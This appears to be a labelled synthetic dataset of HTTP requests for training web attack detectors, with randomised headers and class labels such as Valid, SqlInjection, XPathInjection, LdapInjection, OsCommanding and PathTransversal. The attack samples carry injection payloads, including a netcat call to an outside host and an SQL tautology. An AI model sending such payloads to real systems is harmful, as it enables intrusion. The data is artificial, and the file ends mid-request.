Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Digest cnonce="REnaYh"
Range: -742236,5-8909,-634
Referer: /sybV/ouogt2/uhfsi/asanasx0/eham9oh.swf
TE: chunked,deflate
Trailer: Date
User-Agent: Mozilla/7.0 (Windows; U; Win98 9.1; R7-tt; rv:5.9.2) Gecko/54949352
UA-CPU: MIPS
UA-Disp: 370,042,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 2.1 201.140.223.201:942
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: nopuat/4.5
Warning: 659 www.4uoi.png "b04aynrye3u6tsecce" "Thu, 21 Jul 05 09:43:39 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37041
Start - Id: 30104
class: Valid
GET /eBD/q19Ienu/Zupdate9/rga5x9vkK4JA7_GD.css?j0Esgs6h2lta=0489&rTrdecoih0gqa=tEmbgX_ZR HTTP/1.1
Host: 205.64.109.149
Connection: hQilon
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: compress, compress, compress;q=0.8, deflate
Accept-Language: ef-scr, fmuemo-eh7;q=0.2, aoynm-wqlR, fonpuey-m6son, o9l-gzb2nn
Cache-Control: only-if-cached
Client-ip: 169.51.62.44
Cookie: oqAeiiahlocgwo=6;aGOXxU@t1=rl&;oeytnRhlEesD=577521981;63hnas=rOnh1/;0ta=el@n
Cookie2: $Version="8"
Date: Thu, 04 Feb 10 21:54:21 GMT
ETag: "eJQqX5pzm@.CZrOy"
Expect: 100-continue
From: iustaSag@Odyltrr.it
If-Modified-Since: Thu, 31 Dec 09 04:05:24 UTC
If-Unmodified-Since: Fri, 15 Oct 04 10:09:23 CET
If-Match: "3MZoenLWJtKSQYi05kam"
If-None-Match: *
If-Range: "t4PUx1cRlBsGJkM"
Max-Forwards: 802
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest nc=8CECDa42
Authorization: Digest response="D4AD32FBCb4Cb73A8864dA0a84f45DA6"
Range: -3400,603295-
Referer: /9eadoe/iertenab/ozhsoe/hfsei/tlng.asmx
TE: trailers,trailers
Trailer: Date
User-Agent: eOYOdQ http://www.tbieltec.gov
UA-CPU: MIPS
UA-Disp: 978,2584,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 118x9358
Via: fesaqe/0.0 www.rptRfn.js, 6.3 196.31.148.48, 3a2/1.4 187.209.23.101
Transfer-Encoding: compress
Upgrade: AajeA/4.4
Warning: 166 93.46.119.175 "apeeou6Udinzauet" "Thu, 11 Dec 08 02:46:24 UTC"
X-Forwarded-For: 129.252.117.122
X-Serial-Number: 131299472861769232
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30104
Start - Id: 43419
class: OsCommanding
GET /oitpae2Necm5Afioy4n/zYfXK6dW/tb.q0@MvOgI2/Xq8idWbwp-dp7G-r/xeohxea/ajLl2AQkyX/iieirdnjMxc/yu0Y54hu/mi9fe/s2aoimv7o4Tmko.exe?esoj4nflayntp=elX4BGHCnos&lprTIg=9sSli-sE&rUhmleyeesoo=1s%24&irdi8exearsghh=nDee&0o=omgsoEH+&eprteqene3h=byshutdowns&8iogecaCe3=ptHaOsRazen&sisheMLgnnca0ub=ronetcictndo9&eroh=3612&1l6giaqsndrec=%250a+++++nc+++++www.liesasat.com++++80+%3B&c5huxtoamr=0357 HTTP/1.1
Host: 255.122.144.54
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 115.151.244.56
Cookie: ei0eshh3de=proo@Oaoohedrop
Cookie2: $Version="4"
Date: Fri, 03 Sep 04 16:49:53 GMT
ETag: "ZaC3KO6WlbRZkjCvhW_d"
Expect: oteD40
From: eM8p@ehnasbf.it
If-Modified-Since: Sun, 13 Jun 04 09:04:32 GMT
If-Unmodified-Since: Sun, 25 Jul 04 22:06:29 UTC
If-Match: *
If-None-Match: *
If-Range: "XVF7v0palxOKh_Xy"
Max-Forwards: 7739
MIME-Version: 5.1
Pragma: tzh='y'
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Digest qop=auth
Range: 5130-,89497-47998,93-50140
Referer: http://www.nirpeO9n.be/nsunmn7/usdvenx.jpeg
TE: chunked;q=0.2
Trailer: Warning
User-Agent: adOb4owISrtams
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 319x516
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: gzip
Upgrade: zos/3.8, LrxEi/5.1
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43419
Start - Id: 49528
class: XPathInjection
GET /5ecEta/4sEdrvsfb0eni/updTygDuMS.cfm?8eaocrgot=Ad%27+++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++++%27irSmhu%27%3D+++%27&t2znbEi=nalOft%2F%2Bi&cfoosasac=43971549&hcstyle8L=0846024&4eaEInio=%3C%3B%3F%7Ele%5Ccatpasswd+qR&scriptO-Xoani2Qh=01&lhyKKU9_=iuprh&Y@sk=rLZT0Ix4Z HTTP/1.1
Host: 202.7.235.160:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-tw, iso-8859-2;q=0.8, windows-1258;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: ltota-nouLsnt, f-vyefnr;q=0.2, s-Aii6i;q=0.4
Cache-Control: etTuet='ln'
Client-ip: 91.134.19.242
Cookie: nJ=hWXnMRAH3Gl;Ae=2;Oaidesemxutfats=1974831;eoaisqii=56628;s9gPsn=eaeae;beiieote2d=rgi2oiD
Cookie2: $Version="18"
Date: Tue, 17 Mar 09 24:39:04 CET
ETag: "pUBVRGni3kIAQ_BM_qDc"
Expect: Set5qe
From: jwtneu@uosy.be
If-Modified-Since: Sun, 12 Apr 09 20:51:59 UTC
If-Unmodified-Since: Wed, 02 Jul 08 20:08:49 CET
If-Match: "itWx1sIPDtP89K0VoC6"
If-None-Match: *
If-Range: *
Max-Forwards: 760
MIME-Version: 4.3
Pragma: oNs3r7i=ad1engl
Proxy-Authorization: ae9cy3 mcawsh6=6imqoMWi
Authorization: NTLM c2RlbGl0Y1NObHJ0bmljZVVhdG5nbmxpaE5zZHNUbW9naTVlb25ubg==
Range: 72-,357-,72130-42
Referer: http://www.ee3aopu.fr/seToebeH/oNAh/seagdpe/Nmyt2ri.php
TE: deflate;q=0.5
Trailer: Trailer
User-Agent: mmeimhucgcl
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5470x3164
Via: 2.0 23.248.192.115:447, 7.2 www.daeay.html:718
Transfer-Encoding: eetfro
Upgrade: 2ao/4.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 1653383151363869
----: --------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49528
Start - Id: 16125
class: Valid
GET /0RO22AE0lR.pB_4Et/ai59tlns/tKgOnRC3/dytcsso5etajna/hSZIod3TWPX/TC7phpBJg3waccept0Aplibscript/xi50dY.bin?ns3t=Eba-&yrqnyisaqjyeih=k&p2mcXTs=oEb__94912v&HmWu7Cmz35=12529878&nonrn=+u&pexecDP5stdin=iprou%3De&nnmtdit=8&k6at1re6ez=e9olibea&iephtwskseezrdF=ugq8nIdD&etxbrLtm=a+tqO+&lwponnipohn=140&8ynlt=Sgnds0s6yo&wyc5n9n=e_cJui7_N2FP&DKq3KN=oaogeaEdytE&n4htRosnreofgw=z+ HTTP/1.1
Host: www.C42l5inn.it
Connection: pnms8sdp
Accept: image/gif;q=0.7, application/*;q=0.8, audio/basic
Accept-Charset: x-mac-cyrillic;q=0.0, us-ascii, x-mac-hebrew;q=0.0
Accept-Encoding: identity;q=0.4, deflate;q=0.7, gzip
Accept-Language: erghtikt-t
Cache-Control: no-cache
Client-ip: 52.195.250.238
Cookie: UQ5dtpIj=aj0nnJwjYu;leas9y5ytAjnog=8 etsa9pydkrs inputnsW;e4qee= ce scriptlnn&dcsUmSx;oOU5tii=p2Gd0NjH.Si;hriUvbscriptC5=ouOaxdcr)ipbrsl
Cookie2: $Version="7"
Date: Sun, 19 Jul 09 17:35:58 CET
ETag: W/"@@Ao_oS1B2xROh_kXJ"
Expect: 1ebbA3Jq
From: eutnTors@herbtLcsty.fr
If-Modified-Since: Mon, 17 Jul 06 01:40:51 GMT
If-Unmodified-Since: Sat, 13 Jan 07 09:08:46 CET
If-Match: "EMjGf1rwmXZCPopS"
If-None-Match: "km201qEctfLtT8b"
If-Range: "l4L9zmqgWGfnNBP"
Max-Forwards: 26
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: n8o58 e4piboas=oshTmoq
Authorization: vzete 8eni9u=eDhge
Range: 396-,06-480,6-
Referer: http://www.ndmaeaPr.uk/e8Pvue/onwq8epe/teMcau/bItl.js
TE: chunked;q=0.1,trailers,gzip;q=0.8
Trailer: Pragma
User-Agent: sek3nZ http://www.Rtooel.com
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8164x933
Via: 6.5 www.dbcD2ao.html, a4rnN/2.5 www.cbSc.jpeg
Transfer-Encoding: mw2nh; r7he=avtnEhci
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 964 221.114.71.110:2492 "9tmf4asphah" 
X-Forwarded-For: 45.149.45.168
X-Serial-Number: 6495346475
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16125
Start - Id: 20826
class: Valid
GET /rcwdlpRtcjknceloetaq/u.xf2ackAx4Ch./tgtmakguinnlbpeAdfss/sW2fssn3YSE_2/ueeirgEhmeeoMaAdw8n/l-tJLm_RrU3ZM_yS/srsgz.exe?4yUisateeiscsu=47&FPUAn.Qy=1392181 HTTP/1.1
Host: 209.232.208.146:9
Connection: cdTtra
Accept: */*
Accept-Charset: utf-8, isiri-3342, macintosh;q=0.2, windows-1258
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=7617
Client-ip: 187.246.147.234
Cookie: nexjnail=61;yTnh=ndcwe;lg=s>n
Cookie2: $Version="2"
Date: Fri, 03 Jul 09 04:01:08 UTC
ETag: W/"5eYRdFZh_d3T0SHes67"
Expect: nmao=teaea;oidrhia
From: itbAy3@24cao.it
If-Modified-Since: Fri, 15 Sep 06 07:44:39 UTC
If-Unmodified-Since: Tue, 30 Dec 08 24:06:45 GMT
If-Match: "WM-ghVO06ttY_IJij3h"
If-None-Match: *
If-Range: "NsY.21w_xbb-wgwC03b"
Max-Forwards: 1
MIME-Version: 3.8
Pragma: ogqte=n
Proxy-Authorization: oCeaVw h5ecsw=ezyieu
Authorization: xnem eahs=0nmz
Range: 72115-,9-3120,919774-69202
Referer: http://www.t5rin.net/6Egtea6o/eitiegrw/oviu6ada.exe
TE: gzip;q=0.9,deflate
Trailer: Via
User-Agent: Mozilla/2.6 (compatible; Iuceeeo8; Solaris; 0sncN; r0ieiKey7)
UA-CPU: 68000
UA-Disp: 7276,7233,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3856x4150
Via: FTP/6.9 www.posoNIm.html, 5.2 101.99.10.1, 1.6 www.4yale.shtml:56068
Transfer-Encoding: identity
Upgrade: nfoEet/4.4, cNiaOe/9.4
Warning: 765 186.65.136.9 "kes3cga1t4maesoo" "Mon, 23 Nov 09 01:50:54 CET"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20826
Start - Id: 15992
class: Valid
GET /E6s/m4ysRTah1VtTD/zN3kQC9Oa3/fNTeis9ontl1r/34o/iw5/r1ncm/o.Y/hXs8z2xJl/MCSJgeinsert_ssNRwP/N8T..bin? HTTP/1.1
Host: www.yixo8Dreui.biz:2135
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 69.188.97.64
Cookie: os1maqyh=i2ImtneasnaShavingrdincludepdRo;omnq5=9143
Cookie2: $Version="79"
Date: Sat, 06 Oct 07 01:06:09 CET
ETag: "_D3_axB00MZ4i6j8tw7"
Expect: 5pnte
From: aebIo@aienFcnaoN.cz
If-Modified-Since: Fri, 09 Dec 05 12:46:48 CET
If-Unmodified-Since: Tue, 12 May 09 03:09:15 UTC
If-Match: *
If-None-Match: *
If-Range: "tgjql-3qHmA9X0dBVY"
Max-Forwards: 7345
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM bkRwaHVlU3VvYXV4dWhuaHRvOHRhcmdTb3hoY2VuaWVuc2E=
Authorization: emsS3H to7al=yie9
Range: 4-136390,-06191
Referer: /useE6so/eaoie1/s58c/nelse/gowsain.nsf
TE: trailers,deflate;q=0.7
Trailer: Accept-Language
User-Agent: vHaydite0iexzNnqb
UA-CPU: 68000
UA-Disp: 9829,461,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1814x7324
Via: fwwan/2.4 172.200.7.160, FTP/1.0 www.lNnt.js:76
Transfer-Encoding: 9tco; iiann0sf=9haed
Upgrade: aieRqe/7.7, c9oee/9.2, Halyoi/5.2, nsb/5.8
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 157.210.6.61
X-Serial-Number: 606819653
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15992
Start - Id: 24929
class: Valid
GET /Z4VUWiacpUL/like2updateevalSrurCnodeH-/rA5HC/YIhomercp90vcsboot.iniP/68g5ZUwvXDnhuhTP/tuPV6SgrqNVXCYn1/lbAc/q6EiNGV1NqVMwindow.openf1/adcHsaedriut/su74@-XGMsJgtYL79Acx/efiNevMsnnn4/oei.bin?hmdioriyseTnyc=rbh&Mhuic=76934&ZUQIXxmlll=Tntfh&Yg2GrPh4HSUL=srd HTTP/1.0
Host: 153.164.62.48
Connection: close
Accept: */*;q=0.2
Accept-Charset: cp-932;q=0.6, euc-cn;q=0.1, x-mac-greek;q=0.5, windows-874;q=0.2, euc-cn
Accept-Encoding: *
Accept-Language: tTzen-9rgst
Cache-Control: max-stale=55652
Client-ip: 220.132.178.127
Cookie: swwfgOij1atr=4982044;xp_etcp9v@x3Tcj9=a;jovp9ect=rrtyetA;tzsmin9aleior=is;h5decdfvraowlue=0;lIoruTW@8IDj=y]
Cookie2: $Version="0"
Date: Sat, 27 Dec 08 23:32:43 UTC
ETag: W/"h2Xmy5GCd4Wj_v4L6-3"
Expect: 100-continue
From: pwmfp9h@tptOa1oce.de
If-Modified-Since: Mon, 17 Sep 07 24:57:45 GMT
If-Unmodified-Since: Fri, 02 Oct 09 18:20:42 GMT
If-Match: *
If-None-Match: *
If-Range: "oZ1-J6Mu8C_hfHh"
Max-Forwards: 530
MIME-Version: 0.9
Pragma: ecay5Rwa=wtihuacw
Proxy-Authorization: fir8i hie6oar=onheeas
Authorization: Basic b3dyYTplcklkaGc=
Range: -47448,86125-296,-084
Referer: /klriohm/hieV.sh
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.9 (compatible; Konqueror/3.2; Open BSD i586; efb9)
UA-CPU: MIPS
UA-Disp: 899,4850,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 031x428
Via: q0itog/7.0 67.157.245.129, 4.2 www.a2jusddh.jpeg:911
Transfer-Encoding: compress
Upgrade: aolO/6.3
Warning: 612 www.dskecR.jpg:8674 "r2eeilfhshdeecbm" 
X-Forwarded-For: 138.161.91.52
X-Serial-Number: 2466804840974150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24929
Start - Id: 1038
class: Valid
GET /i2YcJrnRPb.um6cbq/wp-uxH/mHm.R5/sdelei8urH3n/uzerDdnOefL.html? HTTP/1.0
Host: 52.144.250.162
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1257;q=0.8, iso-8859-15;q=0.4
Accept-Encoding: identity
Accept-Language: jaE-kAkua, emen-Hky, eol4u2-jmd
Cache-Control: max-age=50
Client-ip: 131.45.136.130
Cookie: ntMvtrn=zt;bse8f0eat=eerssEsehl3ny3Ease;sosu0BTsfrole=87976;2ihgasareie1so=dhoisa;Jssetrcdunad=52764
Cookie2: $Version="938"
Date: Sat, 23 May 09 16:04:49 CET
ETag: W/"R-BVZkF_bOIKpJN"
Expect: omon5e
From: lSpom@es6vknOma.biz
If-Modified-Since: Thu, 20 Jan 05 10:49:27 GMT
If-Unmodified-Since: Thu, 15 Jan 04 09:20:04 CET
If-Match: "yXFH8@aVT-tPwpzxtZs9"
If-None-Match: *
If-Range: Fri, 29 Dec 06 06:06:31 CET
Max-Forwards: 83
MIME-Version: 7.0
Pragma: gb9oa=eemUt
Proxy-Authorization: id7l4l x1fuyra=sVlhNT
Authorization: r3lzac deblas=Scrslhww
Range: 339-65412,180-85,-47
Referer: http://adp9.org/tnch/ioAaeihr/mecen0mf/dgen.tar
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: 8nia7eoscswb
UA-CPU: MIPS
UA-Disp: 108,3114,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 731x7673
Via: HTTP/4.6 37.79.131.195
Transfer-Encoding: gzip
Upgrade: Ebr/0.5
Warning: 207 243.164.84.195:635 "nErgr" 
X-Forwarded-For: 101.119.184.116
X-Serial-Number: 3135796940
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1038
Start - Id: 41360
class: SqlInjection
PUT /kptit1MtOovia5v/zenao2SeHe5fhaKs/pykFvvEnwy@wLDzmIo/7aaersAeMs9/waiOeenskenrkmio4t.swf? HTTP/1.1
Content-Length: 138
Content-Language: eNscsv
Content-Encoding: deflate
Content-Location: /EtdtsceG/essdtbp/tfft0.sh
Content-MD5: bDBLZEdjaGl0bXJsaVV0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Nov 05 04:27:48 CET
Last-Modified: Thu, 22 Jan 04 09:44:28 UTC
Host: 51.188.194.5:43
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: toc-ait;q=0.3, aerelsh-r;q=0.0, siR1-ioi4tle, bHig4-ieahins4, weeotW-teeNtssI;q=0.0
Cache-Control: no-store
Client-ip: 200.4.215.226
Cookie: fo=ghhhadbhnnozto
Cookie2: $Version="6"
Date: Thu, 20 Aug 09 20:14:48 CET
ETag: "WL2SRiTGa6PzdsbIoDL"
Expect: 100-continue
If-Modified-Since: Sun, 05 Sep 04 23:00:03 CET
If-Unmodified-Since: Sat, 24 Apr 10 22:41:18 UTC
If-Match: "eNemoRxU8IviMzTJ."
If-Range: "RNv@t1doaOCA6mlkV4U"
Max-Forwards: 8818
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: abryl sncnwry=mz4brhd
Authorization: rliv ihys=henttmte
Referer: http://www.Mr1Uow.uk/ytfsptnn/otr4tw/DaetMha/itr6ufeL/sTho.pl
TE: trailers
User-Agent: Mozilla/5.2 (Machintosh; U; PPC Mac OS X 4.2; ma-mn; rv:9.7.8) Gecko/29482001
UA-Disp: 557,1073,8
Via: Ldutiz/2.2 36.118.254.207, Tohqxx/5.7 www.nHjI.gif
Transfer-Encoding: gzip
Upgrade: nhetgd/3.9
Warning: 522 63.253.58.196 "esHrot6irna" 
X-Serial-Number: 309660
----: ------------------------------------

gqOenstxnaeiic5=OR  2238758=2238758&naloan0dhe=Njprocessing-instruction'acceptes&u5KfW_ddzW=hlzvi&hegjansV=20602959&KHTWci6W=565478043

End - Id: 41360
Start - Id: 49256
class: XPathInjection
GET /shvo/5VqHnL_Xdtj3DAfth_/eMwE@FzbTeyhCBJI/e-dMcnl6.7G0o/nm0Ne_Wo4r_.zbZa5yMb/nn/n@ixRupu/R@cz6OVLnJSLZ/tU4Q.YgcIIC4ejGw8A/ey/efv.I/i1.syESoGC-bf@a.asmx?rXOsv=37094716&eoxhpt6teeeso=65+++++or++++h%2Fe%2Fcw%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D7%5D++++or+++157%3D&uhga=hEqciae HTTP/1.1
Host: www.2enecRa.cz
Connection: Srgitct
Accept: */*;q=0.4
Accept-Charset: gb2312;q=0.2
Accept-Encoding: 
Accept-Language: qitnT-yHeleo;q=0.3
Cache-Control: max-stale=8313
Client-ip: 247.83.20.197
Cookie: k4rdkat=cseaWReumt
Cookie2: $Version="9"
Date: Thu, 07 Aug 08 04:58:11 CET
ETag: W/"jGu3szARAyYEzvM"
Expect: wtti
From: lqie@4vraituc.com
If-Modified-Since: Thu, 24 Jun 04 18:32:30 GMT
If-Unmodified-Since: Wed, 06 Jan 10 14:30:24 GMT
If-Match: "@t8lt4xaei4gXQu"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 5.3
Pragma: a0efsn=4hm
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Range: 560-83908
Referer: /oerl9/d4ragin/eraa.asp
TE: trailers,trailers
Trailer: TE
User-Agent: Mozilla/8.9 (Windows; U; Windows NT 2.8; i0-te; rv:3.7.1) Gecko/19330065
UA-CPU: StrongARM
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 666x0440
Via: HTTP/0.0 www.etihadso.jpeg, HTTP/6.3 87.140.109.194, jrpen/6.7 www.moltRj.shtml
Transfer-Encoding: gzip
Upgrade: tlo1ip/4.1, endoki/3.7, 9sp/0.0, 9ost/7.6, hnSf/9.7
Warning: 287 www.niHfiem.jpg "2tmuetibtt1wC" 
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49256
Start - Id: 26354
class: Valid
GET /aV9Z.Po8c/evhlGqNwOoKvIPTX1wT.css?85nrievc=63925858&1rUL=0942028&gLreaptnyfop=czAuisRwhrwnmt&sHtn=+Fnae%26ntlg%24s+x&tiqgaceed13Ftk=93161&eGnph-zsvCRusr=eed&o4dmeXLeamyeIj=32662 HTTP/1.0
Host: www.stouorshc4.fr:80
Connection: rieml0
Accept: application/zip;q=0.6
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.4, gzip
Accept-Language: *
Cache-Control: max-age=08323
Client-ip: 32.250.10.68
Cookie: bYl6gaherhhTle=msttneetees9ti3a;e5fse3c07=e6|U;etzuesfIt8zdto=ng(/1lgroup by&eh zn;tbhgitoolt=4390;o0Mm=td%sock_stream
Cookie2: $Version="220"
Date: Mon, 16 Mar 09 15:44:29 CET
ETag: "FbTf6Kb29yq0VPFnxKC"
Expect: 100-continue
From: sgoc@eboade.org
If-Modified-Since: Wed, 25 Jul 07 01:27:12 CET
If-Unmodified-Since: Fri, 04 May 07 02:15:37 CET
If-Match: *
If-None-Match: *
If-Range: "dN1WAKnuf0hSMU-gi"
Max-Forwards: 3
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Basic bmVyM2J1cjppRWlI
Authorization: Digest uri=/or0ye.asp
Range: 14901-553,6137-8939
Referer: /lphajoeg/1deihiei/tteogks/cIhPo/badht4.mspx
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: pyr0de (j7bupy96ZT; ehOUWT; eOTbKX; y4MIt3I; aXMpfTxb-9)
UA-CPU: 68000
UA-Disp: 4074,748,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7265x363
Via: FTP/2.4 22.140.105.73, clteme/3.1 204.150.243.245
Transfer-Encoding: gzip
Upgrade: f3i/7.2, 4xgd/4.9, 4m3er7/4.0, uiai/5.6
Warning: 770 www.isuhre.shtml:304 "o7pHi4i84noopu8" "Fri, 07 Aug 09 15:30:51 UTC"
X-Forwarded-For: 113.183.151.252
X-Serial-Number: 908761770500
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26354
Start - Id: 38968
class: LdapInjection
GET /oy_QABVYhF@8K6C0J/1WQkTvar/a@TfxQeIZkiHi.htm?mn3bOdP=08592194&RGh=tp7kN3q&cwit8oaLeoZh=1kaDprrFSseichn&srn=dpcophpwpnynq+&r1tetcMrpAcform=u4udayn&ha4ne=nsk4e&oueeoStx2n7b8u=490&Htihe3eiAifoe=19964&OKOEJQSphp=d6eaasoolEtnim&oeRtOsl=0748260&07rtase=31&ntrkxnoietlm9d=2itzsneH%24%24ti&4oaspriur97eege=Iaccepthomea5&ofr=+null50&naj2Ibhue5th=7497%29%28%26%28objectClass%3Dahv0%29%28%7C%28sn++%3Dsla%29%28cn%3Dg++J*%29%29 HTTP/1.1
Host: 126.113.34.239:80
Connection: ngti
Accept: */*;q=0.0
Accept-Charset: koi8-r;q=0.4, windows-1251, euc-jp;q=0.1, iso-8859-8
Accept-Encoding: identity;q=0.7
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 148.36.134.129
Cookie: s6nowlds=se2;e9tsmSsc1=h8m7UaeKbI01;ellpzhoahobn9=aou
Cookie2: $Version="2"
Date: Wed, 30 Jul 08 10:27:39 CET
ETag: "l3lmqo6TvkqJOIm"
Expect: 100-continue
From: hisAka@u5t1a5.st
If-Modified-Since: Fri, 02 Sep 05 08:05:45 GMT
If-Unmodified-Since: Thu, 27 Apr 06 06:14:09 GMT
If-Match: *
If-None-Match: *
If-Range: "vDWG5BbUkt0NAYk"
Max-Forwards: 4806
MIME-Version: 6.4
Pragma: srEedhl='Snxio'
Proxy-Authorization: Digest cnonce="nisso"
Authorization: oestn o6ftes=tfla
Range: -4,236-4976,748576-21
Referer: /no4Io.tiff
TE: chunked,trailers,trailers
Trailer: Pragma
User-Agent: lWmqsnxafrqNgeNe
UA-CPU: 68000
UA-Disp: 716,7145,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0621x5666
Via: 2.2 www.msmmhbh.gif, HTTP/4.2 189.71.159.95:9, hehsw/5.7 www.swch.html:55547
Transfer-Encoding: identity
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 244 129.54.234.141 "tdkaRrieoeridtsfiy" 
X-Forwarded-For: 181.46.26.226
X-Serial-Number: 498357729
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38968
Start - Id: 13699
class: Valid
GET /i1cLpHiP/esa4Ny4antp/sS8Rw.XvEFLkvbswy/hAJpuNb8jkD/Et1ue1gi8edetlnndkl/ez7cpfPAymA.d9e.js? HTTP/1.1
Host: www.neos.it
Connection: plEeyns
Accept: */*
Accept-Charset: x-mac-cyrillic, x-mac-hebrew;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 8.252.160.20
Cookie: tuthatrpTshr=LLl-oOeln;gi0lifeete=N ;sps=01485;Loatlmc='oio;veVDf3Iv8GSN=6777707;8n=einsertoW6yaechoreHea1Ttt ae
Cookie2: $Version="554"
Date: Sun, 11 May 08 17:09:05 UTC
ETag: W/"h1UUMblmY5tubv8d"
Expect: 100-continue
From: s29eksF@wcAom7est.fr
If-Modified-Since: Mon, 08 Jun 09 12:49:20 GMT
If-Unmodified-Since: Thu, 08 May 08 03:56:12 CET
If-Match: "SFI6nCGASwXQbBgP"
If-None-Match: *
If-Range: Wed, 13 Apr 05 24:43:24 UTC
Max-Forwards: 85
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: Basic ZW1kYmhuN286b3NxZW9tbGQ=
Range: 7428-
Referer: /bNogxnNe/ps9ve.txt
TE: trailers,trailers,chunked;q=0.4
Trailer: TE
User-Agent: r6sst/5.4.3
UA-CPU: PowerPC
UA-Disp: 146,6247,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 757x935
Via: 1.3 69.142.201.137
Transfer-Encoding: compress
Upgrade: eeelg/7.7, utMy/3.6, isxk/2.7, aitvl/7.3
Warning: 963 www.nr6uio.htm "hGclte" 
X-Forwarded-For: 18.131.227.185
X-Serial-Number: 1852790108043394492
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13699
Start - Id: 46068
class: PathTransversal
GET /scsbLtemzuei13su/l_N@IbvrAY/feSe4le/hsteisimr/oMB0aj9mG2yy.-C/L_NG2admincAmb82dgf/pl6IRskCTb.jpg?yysur9o=itobolhlrnfe HTTP/1.1
Host: 237.153.42.203:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Encoding: deflate;q=0.0, identity;q=0.5
Accept-Language: AordRxee-tngeL;q=0.9, mBiwr-oyoiteSl, izapeH-ai
Cache-Control: only-if-cached
